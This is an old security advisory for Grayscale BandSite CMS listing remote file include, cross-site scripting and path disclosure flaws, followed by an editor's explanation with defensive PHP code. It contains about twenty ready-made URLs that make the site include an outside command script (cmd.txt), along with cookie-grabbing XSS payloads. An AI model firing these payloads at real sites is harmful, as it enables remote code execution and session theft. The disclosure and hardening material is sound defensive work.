Grayscale BandSite CMS Multiple Input Validation Vulnerabilities

2006.09.29
Credit: soqor
Risk: High
Local: No
Remote: Yes
CWE: N/A

Hello,

Grayscale BandSite CMS Multiple Input Validation Vulnerabilities

Discovered By : HACKERS PAL
Copyright     : HACKERS PAL
Website       : http://www.soqor.net
Email Address : security (at) soqor (dot) net

Remote Include

Each of the following files includes (and executes) a remote script when root_path is supplied from the query string via GLOBALS[root_path]:

includes/content/contact_content.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?
adminpanel/includes/mailinglist/mlist_xls.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addfliersform.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addbioform.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addwearmerchform.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addlyricsform.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addlinksform.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addinterviewsform.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addgenmerchform.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addshowsform.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addreviewsform.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addrelmerchform.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addreleasepicform.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addreleaseform.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addphotosform.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addnewsform.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addmp3.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addmerchpicform.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addmerchform.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addmembioform.php?GLOBALS[root_path]=http://psevil.googlepages.com/cmd.txt?

Xss

The following parameters are echoed into the page without encoding:

adminpanel/includes/helpfiles/help_news.php?the_band=<script>alert(document.cookie);</script>
adminpanel/includes/helpfiles/help_merch.php?the_band=<script>alert(document.cookie);</script>
adminpanel/includes/helpfiles/help_mp3.php?max_file_size_purdy=<script>alert(document.cookie);</script>
adminpanel/includes/mailinglist/sendemail.php?message_text=</textarea><script>alert(document.cookie);</script>
adminpanel/includes/header.php?the_band=</title><script>alert(document.cookie);</script>
adminpanel/login_header.php?the_band=</title><script>alert(document.cookie);</script>
includes/content/bio_content.php?the_band=<Script>alert(document.cookie);</script>
includes/content/gbook_content.php?the_band=<script>alert(document.cookie);</script>
includes/content/interview_content.php?the_band=<script>alert(document.cookie);</script>
includes/content/links_content.php?the_band=<script>alert(document.cookie);</script>
includes/content/lyrics_content.php?the_band=<script>alert(document.cookie);</script>
includes/content/member_content.php?the_band=<script>alert(document.cookie);</script>
includes/content/merch_content.php?the_band=<script>alert(document.cookie);</script>
includes/content/mp3_content.php?the_band=<script>alert(document.cookie);</script>
includes/content/news_content.php?the_band=<script>alert(document.cookie);</script>
includes/content/pastshows_content.php?the_band=<script>alert(document.cookie);</script>
includes/content/photo_content.php?the_band=<script>alert(document.cookie);</script>
includes/content/releases_content.php?the_band=<script>alert(document.cookie);</script>
includes/content/reviews_content.php?the_band=<script>alert(document.cookie);</script>
includes/content/shows_content.php?the_band=<script>alert(document.cookie);</script>
includes/content/signgbook_content.php?the_band=<script>alert(document.cookie);</script>
includes/footer.php?this_year=<script>alert(document.cookie);</script>

Full path disclosure

Requesting any file in includes/content/ directly reveals the full installation path, as does requesting any of the following files:

includes/shows_preview.php
adminpanel/configform.php?submit=1
adminpanel/includes/mailinglist/disphtmltbl.php
adminpanel/includes/mailinglist/dispxls.php
adminpanel/includes/mailinglist/sendshows.php
adminpanel/includes/previews/preview_bio.php
adminpanel/includes/previews/preview_genmerch.php
adminpanel/includes/previews/preview_fliers.php
adminpanel/includes/previews/preview_gbook.php
adminpanel/includes/previews/preview_interviews.php
adminpanel/includes/previews/preview_links.php
adminpanel/includes/previews/preview_lyrics.php
adminpanel/includes/previews/preview_membio.php
adminpanel/includes/previews/preview_merchphotos.php
adminpanel/includes/previews/preview_mp3s.php
adminpanel/includes/previews/preview_news.php
adminpanel/includes/previews/preview_photos.php
adminpanel/includes/previews/preview_releases.php
adminpanel/includes/previews/preview_relmerch.php
adminpanel/includes/previews/preview_relphotos.php
adminpanel/includes/previews/preview_reviews.php
adminpanel/includes/previews/preview_shows.php
adminpanel/includes/previews/preview_wearmerch.php
adminpanel/includes/change_forms/change_bio.php
adminpanel/includes/change_forms/change_fliers.php
adminpanel/includes/change_forms/change_gbook.php
adminpanel/includes/change_forms/change_gen_merch.php
adminpanel/includes/change_forms/change_interview.php
adminpanel/includes/change_forms/change_links.php
adminpanel/includes/change_forms/change_lyrics.php
adminpanel/includes/change_forms/change_members.php
adminpanel/includes/change_forms/change_merch.php
adminpanel/includes/change_forms/change_merch_pic.php
adminpanel/includes/change_forms/change_mp3s.php
adminpanel/includes/change_forms/change_news.php
adminpanel/includes/change_forms/change_photos.php
adminpanel/includes/change_forms/change_rel_merch.php
adminpanel/includes/change_forms/change_rel_pic.php
adminpanel/includes/change_forms/change_releases.php
adminpanel/includes/change_forms/change_reviews.php
adminpanel/includes/change_forms/change_shows.php
adminpanel/includes/change_forms/change_wear_merch.php

WwW.SoQoR.NeT
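Editor's note on the remote include and full path disclosure lists above. The advisory does not name the mechanism, but `?GLOBALS[root_path]=http://.../cmd.txt?` is the classic register_globals overwrite of `$GLOBALS['root_path']` that PHP allowed before 4.4.3 / 5.1.4: an include file that builds its paths from `$root_path`, and that the web server will serve directly, gets that variable from the query string and includes the attacker's URL (the trailing `?` turns the appended path into a query string). Requested directly with no parameter, the same include fails and the PHP warning prints the script's absolute path, which is the "Full path" list. The example below is added here and is not BandSite CMS source; the function, constant and file names are assumed.

```php
<?php
// Added example, not BandSite CMS code. Models the include pattern the
// advisory's URLs imply and the guard that closes both the remote include
// and the full path disclosure. Names (BANDSITE_ENTRY, ROOT_PATH,
// is_safe_root_path, guarded_root_path) are assumed for illustration.
//
// Vulnerable shape (reconstructed, not the real file):
//
//     // includes/content/contact_content.php, reachable directly
//     include($root_path . 'includes/config.php');
//
// With register_globals on, ?GLOBALS[root_path]=http://host/cmd.txt? makes
// that line include http://host/cmd.txt?includes/config.php and run it.
// With no parameter, $root_path is unset, the include fails and the warning
// prints the absolute path of contact_content.php.

// Refuses a root path that would make include() read over the network
// (scheme: or protocol-relative //) or step outside the install directory.
function is_safe_root_path(string $candidate, string $install_dir): bool
{
    if (strpos($candidate, "\0") !== false) {
        return false;                      // null-byte truncation tricks
    }
    // Two or more scheme characters before ':' rejects http:, ftp:, php:,
    // data:, etc. while still allowing a Windows drive letter such as C:
    if (preg_match('#^[a-z][a-z0-9+.\-]+:#i', $candidate) === 1) {
        return false;
    }
    if (strncmp($candidate, '//', 2) === 0) {
        return false;                      // protocol-relative URL
    }
    $real = realpath($candidate);
    $base = realpath($install_dir);
    if ($real === false || $base === false) {
        return false;                      // must exist on the local disk
    }
    return $real === $base
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) === 0;
}

// Hardened include-file preamble: refuse to run unless an entry point has
// defined the marker, and take the root path from a constant the request
// cannot influence rather than from a variable.
function guarded_root_path(): string
{
    if (!defined('BANDSITE_ENTRY')) {
        header('HTTP/1.1 403 Forbidden');  // direct request: fail closed, leak nothing
        exit;
    }
    return ROOT_PATH;
}

// The entry point (index.php in a real install) is the only place that does:
//   define('BANDSITE_ENTRY', true);
//   define('ROOT_PATH', __DIR__ . DIRECTORY_SEPARATOR);
//   require ROOT_PATH . 'includes/content/contact_content.php';

// Constructed inputs: the advisory's attacker URL plus a few variants.
$attacker = 'http://psevil.googlepages.com/cmd.txt?';
var_dump(is_safe_root_path($attacker, __DIR__));
var_dump(is_safe_root_path('//evil.example/cmd.txt?', __DIR__));
var_dump(is_safe_root_path(__DIR__ . '/../', __DIR__));
var_dump(is_safe_root_path(__DIR__, __DIR__));
```

The first three calls return false and the last true. Alongside the code fix, the php.ini settings that remove the attack surface are `register_globals = Off`, `allow_url_include = Off` (PHP 5.2 and later), `allow_url_fopen = Off` where the application does not need it, and `display_errors = Off` so a failed include does not print paths to the client.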
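On the Xss list: two of the payloads start with a closing tag (`</title>` for header.php and login_header.php, `</textarea>` for sendemail.php), which tells you where in the template the value lands. Inside `<title>` and `<textarea>` the browser treats everything as text until it sees the matching end tag, so a script tag only runs if the payload can first close that element. HTML-encoding `<` removes that possibility. The example below is added here and is not BandSite CMS source; the parameter names come from the advisory's URLs, the template fragments are assumed.

```php
<?php
// Added example, not BandSite CMS code. Shows why the advisory's payloads
// break out of <title> and <textarea> when the template echoes $the_band /
// $message_text raw, and the output encoding that stops them. The template
// fragments and function names are assumed.

function h(string $s): string
{
    // Encode for HTML text and attribute contexts. ENT_QUOTES covers both
    // quote styles; ENT_SUBSTITUTE keeps invalid UTF-8 from yielding ''.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Vulnerable: raw interpolation, the shape implied by
// header.php?the_band=</title><script>alert(document.cookie);</script>
function render_title_vulnerable(string $the_band): string
{
    return "<title>{$the_band} - admin</title>";
}

function render_title_fixed(string $the_band): string
{
    return '<title>' . h($the_band) . ' - admin</title>';
}

// Inside <textarea> the parser stays in RCDATA state until </textarea>,
// which is why the sendemail.php payload begins with that tag. Once '<' is
// encoded there is no way to leave that state.
function render_textarea_vulnerable(string $message_text): string
{
    return "<textarea name=\"message_text\">{$message_text}</textarea>";
}

function render_textarea_fixed(string $message_text): string
{
    return '<textarea name="message_text">' . h($message_text) . '</textarea>';
}

// Closing the hole at the source as well: the_band and this_year are site
// configuration, so read them from a fixed config array, never from $_GET
// (or, on old PHP, from register_globals).
function band_name(array $config): string
{
    return isset($config['the_band']) && is_string($config['the_band'])
        ? $config['the_band']
        : 'Unnamed band';
}

// Constructed inputs: the advisory's two break-out payloads.
$title_payload    = '</title><script>alert(document.cookie);</script>';
$textarea_payload = '</textarea><script>alert(document.cookie);</script>';

echo render_title_vulnerable($title_payload), "\n";
echo render_title_fixed($title_payload), "\n";
echo render_textarea_vulnerable($textarea_payload), "\n";
echo render_textarea_fixed($textarea_payload), "\n";
echo band_name(['the_band' => 'Grayscale']), "\n";
```

In the vulnerable outputs the `<script>` element survives intact and would execute; in the fixed outputs every `<` and `>` is an entity, so the closing tag never closes anything and the browser renders the payload as literal text. The same `h()` applies to `this_year` in footer.php and `max_file_size_purdy` in help_mp3.php, both of which are plain text contexts.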


Copyright 2021, cxsecurity.com